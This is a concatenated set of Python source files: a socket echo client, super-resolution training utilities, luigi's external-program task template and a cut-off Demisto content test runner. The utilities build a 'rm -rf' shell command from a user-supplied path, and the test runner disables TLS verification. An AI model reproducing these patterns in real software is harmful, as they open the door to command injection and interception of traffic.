if config.TCPIP_PROT == config.Protocols.TCPIP_PROT_1_UDP:
listener = threading.Thread(target=udp_listener_thread, args=(None,))
sender.start()
if config.TCPIP_PROT == config.Protocols.TCPIP_PROT_1_UDP:
listener.start()
sender.join()
if config.TCPIP_PROT == config.Protocols.TCPIP_PROT_1_UDP:
listener.join()
print(f"{AnsiColors.RESET}Finished")
def sender_thread(args: any):
from config import TCPIP_PROT
from definitions import Protocols
if TCPIP_PROT == Protocols.TCPIP_PROT_0_TCP:
tcp_sender()
elif TCPIP_PROT == Protocols.TCPIP_PROT_1_UDP:
udp_sender()
pass
def tcp_sender():
target_address = SERVER_ADDRESS, SERVER_PORT
string = f"Hello, this is a {PROTOCOL_STRING} test!"
data = string.encode(encoding='utf-8')
print_protected(f"Test string to be sent: {string}")
CLIENT_SOCKET.connect(target_address)
bytes_sent = CLIENT_SOCKET.sendto(data, target_address)
print_protected(f"{AnsiColors.CYAN}Client: Sent {bytes_sent} bytes to server")
CLIENT_SOCKET.shutdown(SHUT_WR)
bytes_rcvd = CLIENT_SOCKET.recv(BUFFER_SIZE)
print_protected(f"{AnsiColors.CYAN}Client: Received back {len(bytes_rcvd)} bytes: {bytes_rcvd}")
pass
def udp_sender():
target_address = SERVER_ADDRESS, SERVER_PORT
string = f"Hello, this is a {PROTOCOL_STRING} test!"
# string = f"Hello World!"
data = string.encode(encoding='utf-8')
print_protected(f"Test string to be sent: {string}")
bytes_sent = CLIENT_SOCKET.sendto(data, target_address)
print_protected(f"{AnsiColors.CYAN}Sender: Sent {bytes_sent} bytes to server")
def udp_listener_thread(args: any):
reply, from_addr = CLIENT_SOCKET.recvfrom(BUFFER_SIZE)
print_protected(f"{AnsiColors.CYAN}Client: Received back {len(reply)} bytes: {reply}")
if __name__ == "__main__":
main()
|
utility.py | import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
print(self.get_path('psnr_log.pt'))
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
external_program.py | # -*- coding: utf-8 -*-
#
# Copyright 2012-2016 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Template tasks for running external programs as luigi tasks.
This module is primarily intended for when you need to call a single external
program or shell script, and it's enough to specify program arguments and
environment variables.
If you need to run multiple commands, chain them together or pipe output
from one command to the next, you're probably better off using something like
`plumbum`_, and wrapping plumbum commands in normal luigi
:py:class:`~luigi.task.Task` s.
.. _plumbum: https://plumbum.readthedocs.io/
"""
import logging
import os
import re
import signal
import subprocess
import sys
import tempfile
from contextlib import contextmanager
from multiprocessing import Process
from time import sleep
import luigi
from luigi.parameter import ParameterVisibility
logger = logging.getLogger('luigi-interface')
class ExternalProgramTask(luigi.Task):
"""
Template task for running an external program in a subprocess
The program is run using :py:class:`subprocess.Popen`, with ``args`` passed
as a list, generated by :py:meth:`program_args` (where the first element should
be the executable). See :py:class:`subprocess.Popen` for details.
Your must override :py:meth:`program_args` to specify the arguments you want,
and you can optionally override :py:meth:`program_environment` if you want to
control the environment variables (see :py:class:`ExternalPythonProgramTask`
for an example).
By default, the output (stdout and stderr) of the run external program
is being captured and displayed after the execution has ended. This
behaviour can be overridden by passing ``--capture-output False``
"""
capture_output = luigi.BoolParameter(default=True, significant=False, positional=False)
stream_for_searching_tracking_url = luigi.parameter.ChoiceParameter(
var_type=str, choices=['none', 'stdout', 'stderr'], default='none',
significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
description="Stream for searching tracking URL")
"""
Used for defining which stream should be tracked for URL, may be set to 'stdout', 'stderr' or 'none'.
Default value is 'none', so URL tracking is not performed.
"""
tracking_url_pattern = luigi.OptionalParameter(
default=None, significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
description="Regex pattern used for searching URL in the logs of the external program")
"""
Regex pattern used for searching URL in the logs of the external program.
If a log line matches the regex, the first group in the matching is set as the tracking URL
for the job in the web UI. Example: 'Job UI is here: (https?://.*)'.
Default value is None, so URL tracking is not performed.
"""
def program_args(self):
"""
Override this method to map your task parameters to the program arguments
:return: list to pass as ``args`` to :py:class:`subprocess.Popen`
"""
raise NotImplementedError
def program_environment(self):
"""
Override this method to control environment variables for the program
:return: dict mapping environment variable names to values
"""
env = os.environ.copy()
return env
@property
def always_log_stderr(self):
"""
When True, stderr will be logged even if program execution succeeded
Override to False to log stderr only when program execution fails.
"""
return True
def _clean_output_file(self, file_object):
file_object.seek(0)
return ''.join(map(lambda s: s.decode('utf-8'), file_object.readlines()))
def build_tracking_url(self, logs_output):
"""
This method is intended for transforming pattern match in logs to an URL
:param logs_output: Found match of `self.tracking_url_pattern`
:return: a tracking URL for the task
"""
return logs_output
def run(self):
args = list(map(str, self.program_args()))
logger.info('Running command: %s', ' '.join(args))
env = self.program_environment()
kwargs = {'env': env}
tmp_stdout, tmp_stderr = None, None
if self.capture_output:
tmp_stdout, tmp_stderr = tempfile.TemporaryFile(), tempfile.TemporaryFile()
kwargs.update({'stdout': tmp_stdout, 'stderr': tmp_stderr})
try:
if self.stream_for_searching_tracking_url != 'none' and self.tracking_url_pattern is not None:
with self._proc_with_tracking_url_context(proc_args=args, proc_kwargs=kwargs) as proc:
proc.wait()
else:
proc = subprocess.Popen(args, **kwargs)
with ExternalProgramRunContext(proc):
proc.wait()
success = proc.returncode == 0
if self.capture_output:
stdout = self._clean_output_file(tmp_stdout)
stderr = self._clean_output_file(tmp_stderr)
if stdout:
logger.info('Program stdout:\n{}'.format(stdout))
if stderr:
if self.always_log_stderr or not success:
logger.info('Program stderr:\n{}'.format(stderr))
else:
stdout, stderr = None, None
if not success:
raise ExternalProgramRunError(
'Program failed with return code={}:'.format(proc.returncode),
args, env=env, stdout=stdout, stderr=stderr)
finally:
if self.capture_output:
tmp_stderr.close()
tmp_stdout.close()
@contextmanager
def _proc_with_tracking_url_context(self, proc_args, proc_kwargs):
time_to_sleep = 0.5
file_to_write = proc_kwargs.get(self.stream_for_searching_tracking_url)
proc_kwargs.update({self.stream_for_searching_tracking_url: subprocess.PIPE})
main_proc = subprocess.Popen(proc_args, **proc_kwargs)
pipe_to_read = main_proc.stderr if self.stream_for_searching_tracking_url == 'stderr' else main_proc.stdout
def _track_url_by_pattern():
"""
Scans the pipe looking for a passed pattern, if the pattern is found, `set_tracking_url` callback is sent.
If tmp_stdout is passed, also appends lines to this file.
"""
pattern = re.compile(self.tracking_url_pattern)
for new_line in iter(pipe_to_read.readline, ''):
if new_line:
if file_to_write:
file_to_write.write(new_line)
match = re.search(pattern, new_line.decode('utf-8'))
if match:
self.set_tracking_url(
self.build_tracking_url(match.group(1))
)
else:
file_to_write.flush()
sleep(time_to_sleep)
track_proc = Process(target=_track_url_by_pattern)
try:
track_proc.start()
with ExternalProgramRunContext(main_proc):
yield main_proc
finally:
# need to wait a bit to let the subprocess read the last lines
track_proc.join(time_to_sleep * 2)
if track_proc.is_alive():
track_proc.terminate()
pipe_to_read.close()
class ExternalProgramRunContext:
def __init__(self, proc):
self.proc = proc
def __enter__(self):
self.__old_signal = signal.getsignal(signal.SIGTERM)
signal.signal(signal.SIGTERM, self.kill_job)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is KeyboardInterrupt:
self.kill_job()
signal.signal(signal.SIGTERM, self.__old_signal)
def kill_job(self, captured_signal=None, stack_frame=None):
self.proc.kill()
if captured_signal is not None:
# adding 128 gives the exit code corresponding to a signal
sys.exit(128 + captured_signal)
class ExternalProgramRunError(RuntimeError):
def __init__(self, message, args, env=None, stdout=None, stderr=None):
super(ExternalProgramRunError, self).__init__(message, args, env, stdout, stderr)
self.message = message
self.args = args
self.env = env
self.out = stdout
self.err = stderr
def __str__(self):
info = self.message
info += '\nCOMMAND: {}'.format(' '.join(self.args))
info += '\nSTDOUT: {}'.format(self.out or '[empty]')
info += '\nSTDERR: {}'.format(self.err or '[empty]')
env_string = None
if self.env:
env_string = ' '.join(['='.join([k, '\'{}\''.format(v)]) for k, v in self.env.items()])
info += '\nENVIRONMENT: {}'.format(env_string or '[empty]')
# reset terminal color in case the ENVIRONMENT changes colors
info += '\033[m'
return info
class ExternalPythonProgramTask(ExternalProgramTask):
"""
Template task for running an external Python program in a subprocess
Simple extension of :py:class:`ExternalProgramTask`, adding two
:py:class:`luigi.parameter.Parameter` s for setting a virtualenv and for
extending the ``PYTHONPATH``.
"""
virtualenv = luigi.OptionalParameter(
default=None,
positional=False,
description='path to the virtualenv directory to use. It should point to '
'the directory containing the ``bin/activate`` file used for '
'enabling the virtualenv.')
extra_pythonpath = luigi.OptionalParameter(
default=None,
positional=False,
description='extend the search path for modules by prepending this '
'value to the ``PYTHONPATH`` environment variable.')
def program_environment(self):
env = super(ExternalPythonProgramTask, self).program_environment()
if self.extra_pythonpath:
pythonpath = ':'.join([self.extra_pythonpath, env.get('PYTHONPATH', '')])
env.update({'PYTHONPATH': pythonpath})
if self.virtualenv:
# Make the same changes to the env that a normal venv/bin/activate script would
path = ':'.join(['{}/bin'.format(self.virtualenv), env.get('PATH', '')])
env.update({
'PATH': path,
'VIRTUAL_ENV': self.virtualenv
})
# remove PYTHONHOME env variable, if it exists
env.pop('PYTHONHOME', None)
return env
|
test_content.py | from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from demisto_client.demisto_api.rest import ApiException
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
PROXY_LOG_FILE_NAME = 'proxy_metrics.csv'
ENV_RESULTS_PATH = './env_results.json'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
'tests on(Valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now(datetime.timezone.utc)}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(xsoar_client):
"""
Turn off telemetry on the AMI instance
:param xsoar_client: Preconfigured client for the XSOAR instance
:return: None
"""
body, status_code, _ = demisto_client.generic_request_func(self=xsoar_client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, username=demisto_user, password=demisto_pass, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, chanel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=chanel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.successful_rerecord_count += 1
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
else:
proxy.failed_rerecord_count += 1
proxy.failed_rerecord_tests.append(playbook_id)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
proxy.successful_tests_count += 1
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
proxy.failed_tests_count += 1
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
